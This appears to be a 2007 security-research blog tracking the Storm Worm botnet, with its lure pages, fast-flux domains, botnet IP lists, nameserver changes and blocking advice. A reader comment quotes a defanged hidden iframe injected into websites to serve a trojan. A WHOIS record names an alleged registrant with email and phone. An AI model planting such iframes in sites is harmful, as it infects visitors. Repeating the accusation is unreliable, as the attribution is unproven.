CME711's latest SE Spam

The Stormworm operators have recently updated their spam and web content. The webpage (capture to the right) is shown in its entirety. Users are then given the opportunity to download and run a malicious file, beijing.exe.

For the last couple months the Storm domains have been less fastfluxy - they change every 60 seconds instead of with every request. Perhaps this is because they simply are too small, or perhaps its because too many people are hitting the DNS servers, causing a Denial of Service attack.

Regardless, we've spotted the following domains in use:

biztech-co.cn, ratedhot.cn, fconnorlaw.cn, pacoast.cn, cadeaux-avenue.cn, likenewvideos.com, tellicolakerealty.cn, activeware.cn, grupogaleria.cn and polkerdesign.cn.


Please update your IDS accordingly.

0.0.0.0 - UPDATED.

Once again, CME711's domain resolvers are all pointing to 0.0.0.0 - which suggests another change is upon us.

What will it be this time? Baseball? My home team has just swept the Diamond Backs, and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!

---

Update from Randy V:
They are back in full force. A nearly complete turn over of the active list from yesterday:

190.128.76.140 200.127.196.112 201.235.46.246 24.126.26.18 67.190.138.189 68.113.78.23 68.57.236.13 68.76.98.212 69.230.199.160 70.243.202.40 70.244.102.159 74.139.41.221 76.100.35.250 76.226.146.196 76.73.135.17 85.187.86.249 88.74.161.197

and the currently active list:

209.102.175.61 219.115.223.181 24.178.197.7 24.178.99.202 24.210.99.223 24.235.140.159 61.84.67.116 67.64.104.4 68.76.98.212 69.151.234.219 71.79.181.218 72.128.41.234 72.128.61.29 72.160.184.227 74.140.168.34 76.216.62.73 76.226.146.196 76.99.89.48 77.197.44.76 84.174.112.145 84.42.164.6 89.112.20.242 98.195.153.198 98.197.63.176

Only 201.235.46.246, 68.76.98.212 and 76.226.146.196 are in common. 76.226.146.196 is probably only a proxy.

Baseball does sound like a ripe target. There has not been a page change yet.

Update 2 (from Nicholas):
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 208.67.222.222 and 208.67.220.220. For more information visit the OpenDNS website.

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting about 13:50 GMT Randy V noticed the domains started rotating the IP's less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL related (and nicely done) which is sharing NFLTracker.exe (NFLTracker.exe - Infected: Trojan.Peed.III). Its not using any of the xor'd javascript or browser exploits. This page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football related names - or that there will be mass infection of football related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'

Storm/Peed Nameserver Update

DISOG researcher Randy Vaughn has identified a new wrinkle with the Stormworm Nameservers. 364 of the identified nameservers are now functioning as open resolvers.

It is likely the storm gang may be preparing poisoned name servers operating behind network perimeters. If they did that they could use network sensitive IPs in order to mask the fact that infected users have had their network settings altered. If the machine owner was aware enough to examine their network settings they might overlook the presence of an IP within their ISP's address space as a DNS IP. I know my initial reaction would be, "oh Grandecom changed the DHCP provided DNS IPs once again", rather than, "hey, that IP doesn't look right." Were I to check the listed, but compromised, name server I would more than likely only verify that CNN went to CNN, and Apple.com went to Apple. I might not think to verify that mybank.com actually went to mybank. Please pay special attention to those SSL Certificates! Storm, all by itself, could cause widely-dispersed financial loss on a large scale; I wouldn't put it past the Storm team to launch targeted phishing attacks in the near future.

Of course there are other, much scarier things these guys could be planning.

I am not a big fan of customer blocks, but I feel this case warrants blocking inbound port 53 (tcp/udp), and outbound port 25 (tcp) traffic immediately.

Jeff Kell reminds us that this could be quite a subtle attack vector weeks or months down the road, even if the machine was cleaned of all malware.

Behold, the power of Storm

As expected, the Storm Botnet has been gaining strength over the last 6 weeks. Current estimates are in the hundreds of thousands, to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique storm related binaries,
3118 unique Storm Serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the storm worm fastflux domains appears to not be privacy hidden. I'm unclear if this is a slip up or a setup, but its interesting!

Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327

Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change:)

The fallowing code was injected into 4 of my websites:
------------------------------------
\"<iframe src=\"http://kqfloat.xxxcom/ind.php\" alt=\"BYDLOSHKA\"
height=\"1\" width=\"1\"></iframe>\"
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, accept one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google i found this news article.

What tells me that the hack of my websites is part of this Storm Botneck.
So I assume they have expanded from email to infiltrating websites to spread out the Worm.